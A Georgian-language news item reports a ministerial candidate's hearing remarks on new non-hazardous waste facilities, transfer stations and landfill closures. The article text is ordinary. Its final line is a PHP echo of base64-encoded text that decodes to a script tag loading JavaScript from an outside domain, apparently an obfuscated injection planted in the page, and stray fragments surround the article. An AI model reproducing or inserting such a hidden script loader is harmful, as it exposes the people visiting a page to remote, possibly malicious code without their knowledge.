celsiusi
ავერსი შნაიდერი

 რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრობის კანდიდატის, ირაკლი ქარსელაძის განცხადებით, წელს დაიწყება არასახიფათო ნარჩენების განთავსების ორი ახალი ობიექტის მშენებლობა სამეგრელო-ზემო სვანეთისა და ქვემო ქართლის რეგიონებისთვის.

ქარსელაძის თქმით, გამოყენებული იქნება მაღალტექნოლოგიური წყლის გამწმენდი სისტემა.

„2023 წელს მიმდინარეობდა და 2024 წელსაც გრძელდება სამუშაოები არასახიფათო ნარჩენების მართვის მიმართულებით. წელს დაიწყება არასახიფათო ნარჩენების განთავსების ორი ახალი ობიექტის მშენებლობა სამეგრელო-ზემო სვანეთის და ქვემო ქართლის რეგიონებისთვის. ახალ ობიექტებზე, გარემოსდაცვითი კუთხით, გამოყენებული იქნება მაღალტექნოლოგიური, მათ შორის, ნაჟური წყლის გამწმენდი „რევერსული ოსმოსის“ სისტემა, რაც, გარემოს დაცვის თვალსაზრისით, ყველა მოთხოვნას დააკმაყოფილებს“, – განაცხადა ირაკლი ქარსელაძემ.

როგორც ქარსელაძემ პარლამენტში მოსმენისას აღნიშნა, მიმდინარე წელს დაგეგმილია ნარჩენების გადამტვირთი ორი სადგურის მშენებლობის დაწყებაც.

მისივე თქმით, 54 მუნიციპალური ნაგავსაყრელიდან უკვე დახურულია 25, მიმდინარეობს ოთხის და დაგეგმილია 12 არსებული ნაგავსაყრელის რეაბილიტაცია-კეთილმოწყობის სამუშაოები.

„მიმდინარეობს რუსთავის ნაგავსაყრელის დახურვის სამუშაოებიც. ასევე, მთელი ქვეყნის მასშტაბით, ახალი რეგიონული არასახიფათო ნარჩენების განთავსების ობიექტების მშენებლობის პარალელურად, გაგრძელდება არსებული ნაგავსაყრელების დახურვის ტენდენცია“, – აღნიშნა ირაკლი ქარსელაძემ.

362
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");